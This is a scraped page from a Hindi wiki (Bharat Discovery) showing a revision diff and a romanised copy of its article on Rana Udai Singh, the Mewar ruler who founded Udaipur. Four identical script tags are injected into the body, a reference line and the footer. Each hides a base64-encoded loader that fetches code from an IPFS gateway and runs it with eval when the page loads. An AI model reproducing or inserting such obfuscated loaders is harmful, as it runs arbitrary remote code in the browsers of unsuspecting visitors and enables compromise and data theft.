Difference between revisions of "राणा उदयसिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 3: Line 3:
 
*इनका जन्म इनके पिता के मरने के बाद हुआ था, और तभी [[गुजरात]] के बहादुरशाह ने [[चित्तौड़]] नष्ट कर दिया था।  
 
*इनका जन्म इनके पिता के मरने के बाद हुआ था, और तभी [[गुजरात]] के बहादुरशाह ने [[चित्तौड़]] नष्ट कर दिया था।  
 
*इनकी माता कर्णवती द्वारा [[हुमायूँ]] को राखीबंद भाई बनाने की बात इतिहासप्रसिद्ध है। मेवाड़ की ख्यातों में इनकी रक्षा की अनेक अलौकिक कहानियाँ कही गई हैं। उदयसिंह को कर्त्तव्यपरायण [[पन्ना धाय|धाय पन्ना]] के साथ बलबीर से रक्षा के लिए जगह-जगह शरण लेनी पड़ी थी।  
 
*इनकी माता कर्णवती द्वारा [[हुमायूँ]] को राखीबंद भाई बनाने की बात इतिहासप्रसिद्ध है। मेवाड़ की ख्यातों में इनकी रक्षा की अनेक अलौकिक कहानियाँ कही गई हैं। उदयसिंह को कर्त्तव्यपरायण [[पन्ना धाय|धाय पन्ना]] के साथ बलबीर से रक्षा के लिए जगह-जगह शरण लेनी पड़ी थी।  
*उदयसिंह 1541 ई. में वे मेवाड़ के राणा हुए और कुछ ही दिनों के बाद [[अकबर]] ने मेवाड़ की राजधानी चित्तौड़ पर चढ़ाई की। हज़ारों मेवाड़ियों की मृत्यु के बाद जब लगा कि चित्तौड़गढ़ अब न बचेगा तब जयमल और पत्ता आदि वीरा के हाथ में उसे छोड़ उदयसिंह [[अरावली पर्वतमाला|अरावली]] के घने जंगलों में चले गए।  
+
*उदयसिंह 1541 ई. में मेवाड़ के राणा हुए और कुछ ही दिनों के बाद [[अकबर]] ने मेवाड़ की राजधानी चित्तौड़ पर चढ़ाई की। हज़ारों मेवाड़ियों की मृत्यु के बाद जब लगा कि चित्तौड़गढ़ अब न बचेगा तब जयमल और पत्ता आदि वीरा के हाथ में उसे छोड़ उदयसिंह [[अरावली पर्वतमाला|अरावली]] के घने जंगलों में चले गए।  
 
*वहाँ उन्होंने नदी की बाढ़ रोक उदयसागर नामक सरोवर का निर्माण किया था। वहीं उदयसिंह ने अपनी नई राजधानी [[उदयपुर]] बसाई।  
 
*वहाँ उन्होंने नदी की बाढ़ रोक उदयसागर नामक सरोवर का निर्माण किया था। वहीं उदयसिंह ने अपनी नई राजधानी [[उदयपुर]] बसाई।  
*चित्तौड़ के विध्वंस के चार वर्ष बाद उदयसिंह का देहांत हो गया। (ओं.ना.उ.)
+
*चित्तौड़ के विध्वंस के चार वर्ष बाद उदयसिंह का देहांत हो गया।
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 09:09, 2 May 2011

thumb|rana udayasianh
Rana UdaiSingh

  • udayasianh meva d ke rana saanga ke putr aur rana pratap ke pita the.
  • inaka janm inake pita ke marane ke bad hua tha, aur tabhi gujarat ke bahadurashah ne chittau d nasht kar diya tha.
  • inaki mata karnavati dvara humayooan ko rakhiband bhaee banane ki bat itihasaprasiddh hai. meva d ki khyatoan mean inaki raksha ki anek alaukik kahaniyaan kahi gee haian. udayasianh ko karttavyaparayan dhay panna ke sath balabir se raksha ke lie jagah-jagah sharan leni p di thi.
  • udayasianh 1541 ee. mean meva d ke rana hue aur kuchh hi dinoan ke bad akabar ne meva d ki rajadhani chittau d par chadhaee ki. hazaroan meva diyoan ki mrityu ke bad jab laga ki chittau dagadh ab n bachega tab jayamal aur patta adi vira ke hath mean use chho d udayasianh aravali ke ghane jangaloan mean chale ge.
  • vahaan unhoanne nadi ki badh rok udayasagar namak sarovar ka nirman kiya tha. vahian udayasianh ne apani nee rajadhani udayapur basaee.
  • chittau d ke vidhvans ke char varsh bad udayasianh ka dehaant ho gaya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

upadhyay, oankaranath “khand 2”, hindi vishvakosh, 1975 (hindi), bharatadiskavari pustakalay: nagari pracharini sabha varanasi, prishth san 91.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>